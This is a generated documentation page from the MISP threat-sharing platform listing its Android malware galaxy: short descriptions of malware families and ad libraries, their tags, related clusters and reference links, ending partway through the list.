Introduction

The MISP threat sharing platform is a free and open source software helping information sharing of threat intelligence including cyber security indicators, financial fraud or counter-terrorism information. The MISP project includes multiple sub-projects to support the operational requirements of analysts and improve the overall quality of information shared.

MISP galaxy is a simple method to express a large object called cluster that can be attached to MISP events or attributes. A cluster can be composed of one or more elements. Elements are expressed as key-values. There are default vocabularies available in MISP galaxy but those can be overwritten, replaced or updated as you wish. Existing clusters and vocabularies can be used as-is or as a template. MISP distribution can be applied to each cluster to permit a limited or broader distribution scheme. The following document is generated from the machine-readable JSON describing the MISP galaxy.

Funding and Support

The MISP project is financially and resource supported by CIRCL Computer Incident Response Center Luxembourg .

A CEF (Connecting Europe Facility) funding under CEF-TC-2016-3 - Cyber Security has been granted from 1st September 2017 until 31th August 2019 as Improving MISP as building blocks for next-generation information sharing.

CEF funding

If you are interested to co-fund projects around MISP, feel free to get in touch with us.

MISP galaxy

Android

Android malware galaxy based on multiple open sources..

Android is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: Unknown

CopyCat

CopyCat is a fully developed malware with vast capabilities, including rooting devices, establishing persistency, and injecting code into Zygote – a daemon responsible for launching apps in the Android operating system – that allows the malware to control any activity on the device.

The tag is: misp-galaxy:android="CopyCat"

Table 1. Table References
Links
https://blog.checkpoint.com/2017/07/06/how-the-copycat-malware-infected-android-devices-around-the-world/

Andr/Dropr-FH

Andr/Dropr-FH can silently record audio and video, monitor texts and calls, modify files, and ultimately spawn ransomware.

The tag is: misp-galaxy:android="Andr/Dropr-FH"

Andr/Dropr-FH is also known as:

GhostCtrl

View relationships graph

Andr/Dropr-FH has relationships with:

similar: misp-galaxy:malpedia="GhostCtrl" with estimative-language:likelihood-probability="likely"

Table 2. Table References
Links
https://nakedsecurity.sophos.com/2017/07/21/watch-out-for-the-android-malware-that-snoops-on-your-phone/
https://www.neowin.net/news/the-ghostctrl-android-malware-can-silently-record-your-audio-and-steal-sensitive-data

Judy

The malware, dubbed Judy, is an auto-clicking adware which was found on 41 apps developed by a Korean company. The malware uses infected devices to generate large amounts of fraudulent clicks on advertisements, generating revenues for the perpetrators behind it.

The tag is: misp-galaxy:android="Judy"

Table 3. Table References
Links
http://fortune.com/2017/05/28/android-malware-judy/
https://blog.checkpoint.com/2017/05/25/judy-malware-possibly-largest-malware-campaign-found-google-play/

RedAlert2

The trojan waits in hiding until the user opens a banking or social media app. When this happens, the trojan shows an HTML-based overlay on top of the original app, alerting the user of an error, and asking to reauthenticate. Red Alert then collects the user’s credentials and sends them to its C&C server.

The tag is: misp-galaxy:android="RedAlert2"

View relationships graph

RedAlert2 has relationships with:

similar: misp-galaxy:malpedia="RedAlert2" with estimative-language:likelihood-probability="likely"

Table 4. Table References
Links
https://www.bleepingcomputer.com/news/security/researchers-discover-new-android-banking-trojan/
https://www.threatfabric.com/blogs/new_android_trojan_targeting_over_60_banks_and_social_apps.html

Tizi

Tizi is a fully featured backdoor that installs spyware to steal sensitive data from popular social media applications. The Google Play Protect security team discovered this family in September 2017 when device scans found an app with rooting capabilities that exploited old vulnerabilities. The team used this app to find more applications in the Tizi family, the oldest of which is from October 2015. The Tizi app developer also created a website and used social media to encourage more app installs from Google Play and third-party websites.

The tag is: misp-galaxy:android="Tizi"

Table 5. Table References
Links
https://security.googleblog.com/2017/11/tizi-detecting-and-blocking-socially.html

DoubleLocker

DoubleLocker can change the device’s PIN, preventing victims from accessing their devices, and also encrypts the data requesting a ransom. It will misuse accessibility services after being installed by impersonating the Adobe Flash player - similar to BankBot.

The tag is: misp-galaxy:android="DoubleLocker"

View relationships graph

DoubleLocker has relationships with:

similar: misp-galaxy:malpedia="DoubleLocker" with estimative-language:likelihood-probability="likely"

Table 6. Table References
Links
https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/

Svpeng

Svpeng is a Banking trojan which acts as a keylogger. If the Android device is not Russian, Svpeng will ask for permission to use accessibility services. In abusing this service it will gain administrator rights allowing it to draw over other apps, send and receive SMS and take screenshots when keys are pressed.

The tag is: misp-galaxy:android="Svpeng"

Svpeng is also known as:

Invisble Man

View relationships graph

Svpeng has relationships with:

similar: misp-galaxy:tool="Svpeng" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Svpeng" with estimative-language:likelihood-probability="likely"

Table 7. Table References
Links
https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/
https://www.theregister.co.uk/2017/08/02/banking_android_malware_in_uk/

LokiBot

LokiBot is a banking trojan for Android 4.0 and higher. It can steal the information and send SMS messages. It has the ability to start web browsers, and banking applications, along with showing notifications impersonating other apps. Upon attempt to remove it will encrypt the devices' external storage requiring Bitcoins to decrypt files.

The tag is: misp-galaxy:android="LokiBot"

View relationships graph

LokiBot has relationships with:

similar: misp-galaxy:malpedia="Loki Password Stealer (PWS)" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="LokiBot" with estimative-language:likelihood-probability="likely"

Table 8. Table References
Links
https://clientsidedetection.com/lokibot_the_first_hybrid_android_malware.html[https://clientsidedetection.com/lokibot_the_first_hybrid_android_malware.html]

BankBot

The main goal of this malware is to steal banking credentials from the victim’s device. It usually impersonates flash player updaters, android system tools, or other legitimate applications.

The tag is: misp-galaxy:android="BankBot"

View relationships graph

BankBot has relationships with:

similar: misp-galaxy:malpedia="Anubis (Android)" with estimative-language:likelihood-probability="likely"

Table 9. Table References
Links
https://blog.fortinet.com/2017/09/19/a-look-into-the-new-strain-of-bankbot
https://forensics.spreitzenbarth.de/android-malware/
https://blog.avast.com/mobile-banking-trojan-sneaks-into-google-play-targeting-wells-fargo-chase-and-citibank-customers

Viking Horde

In rooted devices, Viking Horde installs software and executes code remotely to get access to the mobile data.

The tag is: misp-galaxy:android="Viking Horde"

Table 10. Table References
Links
http://www.alwayson-network.com/worst-types-android-malware-2016/

HummingBad

A Chinese advertising company has developed this malware. The malware has the power to take control of devices; it forces users to click advertisements and download apps. The malware uses a multistage attack chain.

The tag is: misp-galaxy:android="HummingBad"

View relationships graph

HummingBad has relationships with:

similar: misp-galaxy:mitre-malware="HummingBad - S0322" with estimative-language:likelihood-probability="likely"

Table 11. Table References
Links
http://www.alwayson-network.com/worst-types-android-malware-2016/
http://blog.checkpoint.com/wp-content/uploads/2016/07/HummingBad-Research-report_FINAL-62916.pdf

Ackposts

Ackposts is a Trojan horse for Android devices that steals the Contacts information from the compromised device and sends it to a predetermined location.

The tag is: misp-galaxy:android="Ackposts"

Table 12. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-072302-3943-99

Wirex

Wirex is a Trojan horse for Android devices that opens a backdoor on the compromised device which then joins a botnet for conducting click fraud.

The tag is: misp-galaxy:android="Wirex"

Table 13. Table References
Links
https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/
http://www.zdnet.com/article/wirex-ddos-malware-given-udp-flood-capabilities/

WannaLocker

WannaLocker is a strain of ransomware for Android devices that encrypts files on the device’s external storage and demands a payment to decrypt them.

The tag is: misp-galaxy:android="WannaLocker"

Table 14. Table References
Links
https://fossbytes.com/wannalocker-ransomware-wannacry-android/

Switcher

Switcher is a Trojan horse for Android devices that modifies Wi-Fi router DNS settings. Swticher attempts to infiltrate a router’s admin interface on the devices' WIFI network by using brute force techniques. If the attack succeeds, Switcher alters the DNS settings of the router, making it possible to reroute DNS queries to a network controlled by the malicious actors.

The tag is: misp-galaxy:android="Switcher"

View relationships graph

Switcher has relationships with:

similar: misp-galaxy:malpedia="Switcher" with estimative-language:likelihood-probability="likely"

Table 15. Table References
Links
http://www.zdnet.com/article/this-android-infecting-trojan-malware-uses-your-phone-to-attack-your-router/
https://www.theregister.co.uk/2017/01/03/android_trojan_targets_routers/
https://www.symantec.com/security_response/writeup.jsp?docid=2017-090410-0547-99

Vibleaker

Vibleaker was an app available on the Google Play Store named Beaver Gang Counter that contained malicious code that after specific orders from its maker would scan the user’s phone for the Viber app, and then steal photos and videos recorded or sent through the app.

The tag is: misp-galaxy:android="Vibleaker"

Table 16. Table References
Links
http://news.softpedia.com/news/malicious-android-app-steals-viber-photos-and-BankBot-505758.shtml

ExpensiveWall

ExpensiveWall is Android malware that sends fraudulent premium SMS messages and charges users accounts for fake services without their knowledge

The tag is: misp-galaxy:android="ExpensiveWall"

Table 17. Table References
Links
https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/
http://fortune.com/2017/09/14/google-play-android-malware/

Cepsohord

Cepsohord is a Trojan horse for Android devices that uses compromised devices to commit click fraud, modify DNS settings, randomly delete essential files, and download additional malware such as ransomware.

The tag is: misp-galaxy:android="Cepsohord"

Table 18. Table References
Links
https://www.cyber.nj.gov/threat-profiles/android-malware-variants/cepsohord

Fakem Rat

Fakem RAT makes their network traffic look like well-known protocols (e.g. Messenger traffic, HTML pages).

The tag is: misp-galaxy:android="Fakem Rat"

Table 19. Table References
Links
https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-fakem-rat.pdf
https://www.symantec.com/security_response/writeup.jsp?docid=2016-012608-1538-99

GM Bot

GM Bot – also known as Acecard, SlemBunk, or Bankosy – scams people into giving up their banking log-in credentials and other personal data by displaying overlays that look nearly identical to banking apps log-in pages. Subsequently, the malware intercepts SMS to obtain two-factor authentication PINs, giving cybercriminals full access to bank accounts.

The tag is: misp-galaxy:android="GM Bot"

GM Bot is also known as:

Acecard
SlemBunk
Bankosy

View relationships graph

GM Bot has relationships with:

similar: misp-galaxy:tool="Slempo" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:android="Bankosy" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Slempo" with estimative-language:likelihood-probability="likely"

Table 20. Table References
Links
https://blog.avast.com/android-trojan-gm-bot-is-evolving-and-targeting-more-than-50-banks-worldwide

Moplus

The Wormhole vulnerability in the Moplus SDK could be exploited by hackers to open an unsecured and unauthenticated HTTP server connection on the user’s device, and this connection is established in the background without the user’s knowledge.

The tag is: misp-galaxy:android="Moplus"

Table 21. Table References
Links
http://securityaffairs.co/wordpress/41681/hacking/100m-android-device-baidu-moplus-sdk.html

Adwind

Adwind is a backdoor written purely in Java that targets system supporting the Java runtime environment. Commands that can be used, among other things, to display messages on the system, open URLs, update the malware, download/execute files, and download/load plugins. According to the author, the backdoor component can run on Windows, Mac OS, Linux and Android platforms providing rich capabilities for remote control, data gathering, data exfiltration and lateral movement.

The tag is: misp-galaxy:android="Adwind"

Adwind is also known as:

AlienSpy
Frutas
Unrecom
Sockrat
Jsocket
jRat
Backdoor:Java/Adwind

View relationships graph

Adwind has relationships with:

similar: misp-galaxy:rat="Adwind RAT" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="Adwind" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:android="Sockrat" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="AdWind" with estimative-language:likelihood-probability="likely"

Table 22. Table References
Links
https://securelist.com/adwind-faq/73660/

AdSms

Adsms is a Trojan horse that may send SMS messages from Android devices.

The tag is: misp-galaxy:android="AdSms"

Table 23. Table References
Links
https://www.fortiguard.com/encyclopedia/virus/7389670
https://www.symantec.com/security_response/writeup.jsp?docid=2011-051313-4039-99

Airpush

Airpush is a very aggresive Ad - Network

The tag is: misp-galaxy:android="Airpush"

Airpush is also known as:

StopSMS

Table 24. Table References
Links
https://crypto.stanford.edu/cs155old/cs155-spring16/lectures/18-mobile-malware.pdf

BeanBot

BeanBot forwards device’s data to a remote server and sends out premium-rate SMS messages from the infected device.

The tag is: misp-galaxy:android="BeanBot"

Table 25. Table References
Links
https://www.f-secure.com/v-descs/trojan_android_beanbot.shtml

Kemoge

Kemoge is adware that disguises itself as popular apps via repackaging, then allows for a complete takeover of the users Android device.

The tag is: misp-galaxy:android="Kemoge"

View relationships graph

Kemoge has relationships with:

similar: misp-galaxy:mitre-malware="ShiftyBug - S0294" with estimative-language:likelihood-probability="likely"

Table 26. Table References
Links
https://www.fireeye.com/blog/threat-research/2015/10/kemoge_another_mobi.html
https://www.symantec.com/security_response/writeup.jsp?docid=2015-101207-3555-99

Ghost Push

Ghost Push is a family of malware that infects the Android OS by automatically gaining root access, downloading malicious software, masquerading as a system app, and then losing root access, which then makes it virtually impossible to remove the infection even by factory reset unless the firmware is reflashed.

The tag is: misp-galaxy:android="Ghost Push"

Table 27. Table References
Links
https://en.wikipedia.org/wiki/Ghost_Push
https://blog.avast.com/how-to-protect-your-android-device-from-ghost-push

BeNews

The BeNews app is a backdoor app that uses the name of defunct news site BeNews to appear legitimate. After installation it bypasses restrictions and downloads additional threats to the compromised device.

The tag is: misp-galaxy:android="BeNews"

Table 28. Table References
Links
http://blog.trendmicro.com/trendlabs-security-intelligence/fake-news-app-in-hacking-team-dump-designed-to-bypass-google-play/

Accstealer

Accstealer is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Accstealer"

Table 29. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2015-012711-1159-99

Acnetdoor

Acnetdoor is a detection for Trojan horses on the Android platform that open a back door on the compromised device.

The tag is: misp-galaxy:android="Acnetdoor"

Table 30. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-051611-4258-99

Acnetsteal

Acnetsteal is a detection for Trojan horses on the Android platform that steal information from the compromised device.

The tag is: misp-galaxy:android="Acnetsteal"

Table 31. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-051612-0505-99

Actech

Actech is a Trojan horse for Android devices that steals information and sends it to a remote location.

The tag is: misp-galaxy:android="Actech"

Table 32. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-080111-3948-99

AdChina

AdChina is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="AdChina"

Table 33. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-032814-2947-99

Adfonic

Adfonic is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Adfonic"

Table 34. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052615-0024-99

AdInfo

AdInfo is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="AdInfo"

Table 35. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-2433-99

Adknowledge

Adknowledge is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Adknowledge"

Table 36. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052822-1033-99

AdMarvel

AdMarvel is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="AdMarvel"

Table 37. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-060621-2450-99

AdMob

AdMob is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="AdMob"

Table 38. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052822-3437-99

Adrd

Adrd is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Adrd"

Table 39. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-021514-4954-99

Aduru

Aduru is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Aduru"

Table 40. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052618-2419-99

Adwhirl

Adwhirl is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Adwhirl"

Table 41. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052918-1414-99

Adwlauncher

Adwlauncher is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Adwlauncher"

Table 42. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-082308-1823-99

Adwo

Adwo is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Adwo"

Table 43. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-032814-5806-99

Airad

Airad is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Airad"

Table 44. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-1704-99

Alienspy

Alienspy is a Trojan horse for Android devices that steals information from the compromised device. It may also download potentially malicious files.

The tag is: misp-galaxy:android="Alienspy"

Table 45. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2015-042714-5942-99

AmazonAds

AmazonAds is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="AmazonAds"

Table 46. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052618-5002-99

Answerbot

Answerbot is a Trojan horse that opens a back door on Android devices.

The tag is: misp-galaxy:android="Answerbot"

Table 47. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-100711-2129-99

Antammi

Antammi is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Antammi"

Table 48. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-032106-5211-99

Apkmore

Apkmore is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Apkmore"

Table 49. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040113-4813-99

Aplog

Aplog is a Trojan horse for Android devices that steals information from the device.

The tag is: misp-galaxy:android="Aplog"

Table 50. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-100911-1023-99

Appenda

Appenda is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Appenda"

Table 51. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-062812-0516-99

Apperhand

Apperhand is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Apperhand"

Table 52. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-5637-99

Appleservice

Appleservice is a Trojan horse for Android devices that may steal information from the compromised device.

The tag is: misp-galaxy:android="Appleservice"

Table 53. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-031011-4321-99

AppLovin

AppLovin is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="AppLovin"

Table 54. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040112-1739-99

Arspam

Arspam is a Trojan horse for Android devices that sends spam SMS messages to contacts on the compromised device.

The tag is: misp-galaxy:android="Arspam"

Table 55. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-121915-3251-99

Aurecord

Aurecord is a spyware application for Android devices that allows the device it is installed on to be monitored.

The tag is: misp-galaxy:android="Aurecord"

Table 56. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-031914-2310-99

Backapp

Backapp is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Backapp"

Table 57. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-092708-5017-99

Backdexer

Backdexer is a Trojan horse for Android devices that may send premium-rate SMS messages from the compromised device.

The tag is: misp-galaxy:android="Backdexer"

Table 58. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-121812-2502-99

Backflash

Backflash is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Backflash"

Table 59. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-091714-0427-99

Backscript

Backscript is a Trojan horse for Android devices that downloads files onto the compromised device.

The tag is: misp-galaxy:android="Backscript"

Table 60. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-090704-3639-99

Badaccents

Badaccents is a Trojan horse for Android devices that may download apps on the compromised device.

The tag is: misp-galaxy:android="Badaccents"

Table 61. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-123015-3618-99

Badpush

Badpush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Badpush"

Table 62. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040311-4133-99

Ballonpop

Ballonpop is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Ballonpop"

Table 63. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-120911-1731-99

Bankosy

Bankosy is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Bankosy"

View relationships graph

Bankosy has relationships with:

similar: misp-galaxy:tool="Slempo" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:android="GM Bot" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Slempo" with estimative-language:likelihood-probability="likely"

Table 64. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-072316-5249-99

Bankun

Bankun is a Trojan horse for Android devices that replaces certain banking applications on the compromised device.

The tag is: misp-galaxy:android="Bankun"

Table 65. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-072318-4143-99

Basebridge

Basebridge is a Trojan horse that attempts to send premium-rate SMS messages to predetermined numbers.

The tag is: misp-galaxy:android="Basebridge"

Table 66. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-060915-4938-99

Basedao

Basedao is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Basedao"

Table 67. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-061715-3303-99

Batterydoctor

Batterydoctor is Trojan that makes exaggerated claims about the device’s ability to recharge the battery, as well as steal information.

The tag is: misp-galaxy:android="Batterydoctor"

Table 68. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-101916-0847-99

Beaglespy

Beaglespy is an Android mobile detection for the Beagle spyware program as well as its associated client application.

The tag is: misp-galaxy:android="Beaglespy"

Table 69. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-091010-0627-99

Becuro

Becuro is a Trojan horse for Android devices that downloads potentially malicious files onto the compromised device.

The tag is: misp-galaxy:android="Becuro"

Table 70. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2015-051410-3348-99

Beita

Beita is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Beita"

Table 71. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-110111-1829-99

Bgserv

Bgserv is a Trojan that opens a back door and transmits information from the device to a remote location.

The tag is: misp-galaxy:android="Bgserv"

Table 72. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-031005-2918-99

Biigespy

Biigespy is an Android mobile detection for the Biige spyware program as well as its associated client application.

The tag is: misp-galaxy:android="Biigespy"

Table 73. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-091012-0526-99

Bmaster

Bmaster is a Trojan horse on the Android platform that opens a back door, downloads files and steals potentially confidential information from the compromised device.

The tag is: misp-galaxy:android="Bmaster"

Table 74. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-020609-3003-99

Bossefiv

Bossefiv is a Trojan horse for Android devices that steals information.

The tag is: misp-galaxy:android="Bossefiv"

Table 75. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2015-061520-4322-99

Boxpush

Boxpush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Boxpush"

Table 76. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-4613-99

Burstly

Burstly is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Burstly"

Table 77. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052918-1443-99

Buzzcity

Buzzcity is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Buzzcity"

Table 78. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052918-1454-99

ByPush

ByPush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="ByPush"

Table 79. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040315-4708-99

Cajino

Cajino is a Trojan horse for Android devices that opens a back door on the compromised device.

The tag is: misp-galaxy:android="Cajino"

Table 80. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2015-040210-3746-99

Casee

Casee is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Casee"

Table 81. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052919-3501-99

Catchtoken

Catchtoken is a Trojan horse for Android devices that intercepts SMS messages and opens a back door on the compromised device.

The tag is: misp-galaxy:android="Catchtoken"

Table 82. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-121619-0548-99

Cauly

Cauly is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Cauly"

Table 83. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052919-3454-99

Cellshark

Cellshark is a spyware application for Android devices that periodically gathers information from the device and uploads it to a predetermined location.

The tag is: misp-galaxy:android="Cellshark"

Table 84. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-111611-0914-99

Centero

Centero is a Trojan horse for Android devices that displays advertisements on the compromised device.

The tag is: misp-galaxy:android="Centero"

Table 85. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-053006-2502-99

Chuli

Chuli is a Trojan horse for Android devices that opens a back door and may steal information from the compromised device.

The tag is: misp-galaxy:android="Chuli"

Table 86. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-032617-1604-99

Citmo

Citmo is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Citmo"

Table 87. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-030715-5012-99

Claco

Claco is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Claco"

Table 88. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-020415-5600-99

Clevernet

Clevernet is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Clevernet"

Table 89. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-5257-99

Cnappbox

Cnappbox is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Cnappbox"

Table 90. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040215-1141-99

Cobblerone

Cobblerone is a spyware application for Android devices that can track the phone’s location and remotely erase the device.

The tag is: misp-galaxy:android="Cobblerone"

Table 91. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-111514-3846-99

Coolpaperleak

Coolpaperleak is a Trojan horse for Android devices that steals information and sends it to a remote location.

The tag is: misp-galaxy:android="Coolpaperleak"

Table 92. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-080211-5757-99

Coolreaper

Coolreaper is a Trojan horse for Android devices that opens a back door on the compromised device. It may also steal information and download potentially malicious files.

The tag is: misp-galaxy:android="Coolreaper"

Table 93. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2015-011220-3211-99

Cosha

Cosha is a spyware program for Android devices that monitors and sends certain information to a remote location.

The tag is: misp-galaxy:android="Cosha"

Table 94. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-081712-5231-99

Counterclank

Counterclank is a Trojan horse for Android devices that steals information.

The tag is: misp-galaxy:android="Counterclank"

Table 95. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-012709-4046-99

Crazymedia

Crazymedia is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Crazymedia"

Table 96. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040312-2547-99

Crisis

Crisis is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Crisis"

View relationships graph

Crisis has relationships with:

similar: misp-galaxy:malpedia="RCS" with estimative-language:likelihood-probability="likely"

Table 97. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2015-071409-0636-99

Crusewind

Crusewind is a Trojan horse for Android devices that sends SMS messages to a premium-rate number.

The tag is: misp-galaxy:android="Crusewind"

Table 98. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-070301-5702-99

Dandro

Dandro is a Trojan horse for Android devices that allows a remote attacker to gain control over the device and steal information from it.

The tag is: misp-galaxy:android="Dandro"

Table 99. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-012916-2128-99

Daoyoudao

Daoyoudao is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Daoyoudao"

Table 100. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040214-5018-99

Deathring

Deathring is a Trojan horse for Android devices that may perform malicious activities on the compromised device.

The tag is: misp-galaxy:android="Deathring"

Table 101. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-121116-4547-99

Deeveemap

Deeveemap is a Trojan horse for Android devices that downloads potentially malicious files onto the compromised device.

The tag is: misp-galaxy:android="Deeveemap"

Table 102. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2017-060907-5221-99

Dendoroid

Dendoroid is a Trojan horse for Android devices that opens a back door, steals information, and may perform other malicious activities on the compromised device.

The tag is: misp-galaxy:android="Dendoroid"

Table 103. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-030418-2633-99

Dengaru

Dengaru is a Trojan horse for Android devices that performs click-fraud from the compromised device.

The tag is: misp-galaxy:android="Dengaru"

Table 104. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2015-051113-4819-99

Diandong

Diandong is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Diandong"

Table 105. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-2453-99

Dianjin

Dianjin is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Dianjin"

Table 106. Table References
Links
